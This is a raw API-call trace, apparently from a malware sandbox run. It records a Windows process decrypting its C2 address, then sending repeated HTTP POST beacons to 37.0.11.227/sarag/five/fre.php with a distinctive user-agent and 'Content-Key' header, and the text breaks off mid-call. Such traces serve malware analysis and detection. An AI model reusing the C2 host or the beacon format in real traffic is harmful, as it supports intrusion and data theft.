1 [0182.341] GetProcessHeap () returned 0x690000 [0182.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.342] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.343] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.344] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.346] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.346] GetProcessHeap () returned 0x690000 [0182.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0182.346] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.346] GetProcessHeap () returned 0x690000 [0182.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.347] GetProcessHeap () returned 0x690000 [0182.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.347] GetProcessHeap () returned 0x690000 [0182.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0182.348] GetProcessHeap () returned 0x690000 [0182.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0182.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0182.364] GetProcessHeap () returned 0x690000 [0182.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0182.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.365] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.366] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.367] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.367] GetProcessHeap () returned 0x690000 [0182.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0182.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.368] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0182.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.370] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.371] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0182.371] GetProcessHeap () returned 0x690000 [0182.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.372] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0182.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.373] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0182.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.381] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0182.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.382] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0182.382] GetProcessHeap () returned 0x690000 [0182.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0182.382] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6af9c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0182.382] GetProcessHeap () returned 0x690000 [0182.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0182.382] socket (af=2, type=1, protocol=6) returned 0x2f4 [0182.383] connect (s=0x2f4, name=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0182.410] FreeAddrInfoW (pAddrInfo=0x6af9c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0182.410] GetProcessHeap () returned 0x690000 [0182.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0182.410] GetProcessHeap () returned 0x690000 [0182.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0182.411] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.412] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.412] GetProcessHeap () returned 0x690000 [0182.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a9b38 [0182.412] GetProcessHeap () returned 0x690000 [0182.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.412] GetProcessHeap () returned 0x690000 [0182.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0182.412] GetProcessHeap () returned 0x690000 [0182.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0182.413] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.414] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.414] GetProcessHeap () returned 0x690000 [0182.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0182.414] GetProcessHeap () returned 0x690000 [0182.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.415] send (s=0x2f4, buf=0x6abd08*, len=242, flags=0) returned 242 [0182.415] send (s=0x2f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0182.415] GetProcessHeap () returned 0x690000 [0182.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0182.415] recv (in: s=0x2f4, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0182.512] GetProcessHeap () returned 0x690000 [0182.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0182.513] GetProcessHeap () returned 0x690000 [0182.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0182.513] GetProcessHeap () returned 0x690000 [0182.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9b38 | out: hHeap=0x690000) returned 1 [0182.514] GetProcessHeap () returned 0x690000 [0182.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0182.514] closesocket (s=0x2f4) returned 0 [0182.514] GetProcessHeap () returned 0x690000 [0182.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0182.514] GetProcessHeap () returned 0x690000 [0182.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.515] GetProcessHeap () returned 0x690000 [0182.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.515] GetProcessHeap () returned 0x690000 [0182.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb20) returned 0x2f4 [0182.517] Sleep (dwMilliseconds=0xea60) [0182.521] GetProcessHeap () returned 0x690000 [0182.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0182.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.522] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.528] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0182.533] GetProcessHeap () returned 0x690000 [0182.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0182.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.534] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.535] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.536] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.536] GetProcessHeap () returned 0x690000 [0182.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0182.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.537] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0182.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.538] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.538] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0182.539] GetProcessHeap () returned 0x690000 [0182.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.539] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.543] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.544] GetProcessHeap () returned 0x690000 [0182.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0182.545] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.545] GetProcessHeap () returned 0x690000 [0182.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.545] GetProcessHeap () returned 0x690000 [0182.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.546] GetProcessHeap () returned 0x690000 [0182.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.546] GetProcessHeap () returned 0x690000 [0182.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0182.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.548] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.561] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0182.568] GetProcessHeap () returned 0x690000 [0182.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0182.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.569] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.570] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.571] GetProcessHeap () returned 0x690000 [0182.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0182.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.572] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0182.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.573] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.574] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0182.574] GetProcessHeap () returned 0x690000 [0182.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.575] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0182.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.576] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0182.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.577] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0182.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.578] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0182.578] GetProcessHeap () returned 0x690000 [0182.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0182.578] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6af560*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0182.578] GetProcessHeap () returned 0x690000 [0182.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0182.578] socket (af=2, type=1, protocol=6) returned 0x2f8 [0182.578] connect (s=0x2f8, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0182.606] FreeAddrInfoW (pAddrInfo=0x6af560*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0182.606] GetProcessHeap () returned 0x690000 [0182.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0182.606] GetProcessHeap () returned 0x690000 [0182.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0182.608] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.610] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.610] GetProcessHeap () returned 0x690000 [0182.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a98f8 [0182.610] GetProcessHeap () returned 0x690000 [0182.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.611] GetProcessHeap () returned 0x690000 [0182.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0182.611] GetProcessHeap () returned 0x690000 [0182.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0182.613] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.614] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.614] GetProcessHeap () returned 0x690000 [0182.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0182.614] GetProcessHeap () returned 0x690000 [0182.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.615] send (s=0x2f8, buf=0x6abd08*, len=242, flags=0) returned 242 [0182.615] send (s=0x2f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0182.615] GetProcessHeap () returned 0x690000 [0182.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0182.616] recv (in: s=0x2f8, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0182.721] GetProcessHeap () returned 0x690000 [0182.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0182.721] GetProcessHeap () returned 0x690000 [0182.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.721] GetProcessHeap () returned 0x690000 [0182.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a98f8 | out: hHeap=0x690000) returned 1 [0182.722] GetProcessHeap () returned 0x690000 [0182.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0182.722] closesocket (s=0x2f8) returned 0 [0182.723] GetProcessHeap () returned 0x690000 [0182.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0182.723] GetProcessHeap () returned 0x690000 [0182.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.723] GetProcessHeap () returned 0x690000 [0182.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0182.723] GetProcessHeap () returned 0x690000 [0182.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0182.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb1c) returned 0x2f8 [0182.726] Sleep (dwMilliseconds=0xea60) [0182.727] GetProcessHeap () returned 0x690000 [0182.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0182.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.729] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0182.743] GetProcessHeap () returned 0x690000 [0182.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0182.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.744] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0182.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.745] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.746] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.746] GetProcessHeap () returned 0x690000 [0182.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0182.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.747] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0182.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.748] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0182.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.749] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0182.749] GetProcessHeap () returned 0x690000 [0182.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.750] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.753] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.754] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.755] StrStrA 